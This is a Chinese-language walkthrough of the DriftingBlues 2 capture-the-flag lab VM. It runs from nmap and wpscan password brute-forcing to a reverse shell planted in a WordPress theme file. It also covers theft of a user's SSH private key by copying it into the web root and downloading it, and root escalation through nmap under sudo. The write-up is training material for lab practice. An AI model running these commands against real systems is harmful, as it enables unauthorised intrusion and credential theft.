IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> driftingblues 2靶机wp -> 正文阅读

[PHP知识库]driftingblues 2靶机wp

主机探活

nmap -sP 192.168.159.0/24 

目标主机IP为:192.168.159.165


端口发现

nmap -sP 192.168.159.0/24

在这里插入图片描述

开放端口为:21、22、80端口


21端口

匿名登陆

ftp 192.168.159.165

在这里插入图片描述

成功登录


查看,信息收集

在这里插入图片描述

发现只有一张图片,下载后也没有发现什么有用的信息,就一普通图片

在这里插入图片描述


80端口

nikto

nikto -h 192.168.159.165

在这里插入图片描述

发现该网站下有一个 blog,且是 wordpress 搭建的


目录扫描

dirsearch -u 192.168.159.165

在这里插入图片描述

扫出了一个 blog 网站,访问一下

在这里插入图片描述

发现未加载 css 等信息,猜测有一个域名,浏览源码,找到域名

在这里插入图片描述

driftingblues.box


写到本地 hosts文件中,再次访问

在这里插入图片描述

在这里插入图片描述


对 blog 再做一次目录扫描

http://driftingblues.box/blog/

在这里插入图片描述

基本可以确定是 wordpress 了,我对这些路径都进行了访问与信息收集,但是没有获得什么有效信息(只获得了登录页面可以爆破用户名)


wpscan

使用 wpscan 工具来对 wordpress 站点进行扫描(主要就是用来爆破用户名和密码)(也可以用burpsuite爆破,我为了了解下这个工具,所以用工具了)

apt-get install wpscan -y	# 下载
wpscan --help		# 查看参数

在这里插入图片描述


wpscan --url http://driftingblues.box/blog -e u 
# --url  指定目标url
# -e 爆破模式	-u 爆破用户名

在这里插入图片描述

用户名:albert


wpscan --url http://driftingblues.box/blog -e u -P /usr/share/wordlists/rockyou.txt		# 爆破密码

在这里插入图片描述

用户名:albert 密码:scotland1


访问http://driftingblues.box/blog/wp-login.php,输入账户密码,成功登录

在这里插入图片描述

这个网站提供了网站风格的配置选项,我们查看一下(Appearance --> Theme File Editor)

在这里插入图片描述


我们修改它的 404 notfound 页面

在这里插入图片描述


改为反弹shll的php代码

在这里插入图片描述


本机打开端口监听,并随便访问一个不存在的网址,如:driftingblues.box/blog/index.php/202/17/crosscut-saw/

nc -nlvp 7777

1

成功获取shell


提权

setuid

find / -perm -u=s -type f 2>/dev/null

没有可以利用的东西。。。


计划任务

crontab -l
cat /etc/crontab

也没有可用信息。。。


sudo

sudo -l

没有可用信息。。。


信息收集

如图,在 /home 目录下找到一个用户,可读可执行

之后在该用户目录中发现存在 ssh 配置文件夹,且可读可执行

在这里插入图片描述


进入 .ssh 文件夹,发现存在公私钥信息文件,且私钥文件可读可执行

在这里插入图片描述


ssh

将该私钥文件移入web目录下,主机进行下载

cd /var/www/html/blog
cp /home/freddie/.ssh/id_rsa .

在这里插入图片描述


wget http://driftingblues.box/blog/id_rsa

在这里插入图片描述


ssh远程连接,用户名:freddie

ssh 192.168.159.165 -l freddie -i id_rsa 

在这里插入图片描述


发现无法成功连接,给出的提示信息时 id_rsa 太 open 了,要求该文件不能被其他文件访问,所以要修改该文件的权限

# 直接把权限改为 400
chmod 400 id_rsa

在这里插入图片描述


重新连接,成功登录

在这里插入图片描述


sudo-nmap

sudo -l

在这里插入图片描述


可以利用 nmap 提权,访问 https://gtfobins.github.io/gtfobins/nmap/ 找到提权方式

在这里插入图片描述


选择一个进行提权

TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
nmap --script=$TF

成功获取 root 权限

在这里插入图片描述


换个友好的命令行

python3 -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述

结束!!!

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2022-09-04 00:50:49  更:2022-09-04 00:51:13 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/23 6:03:09-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码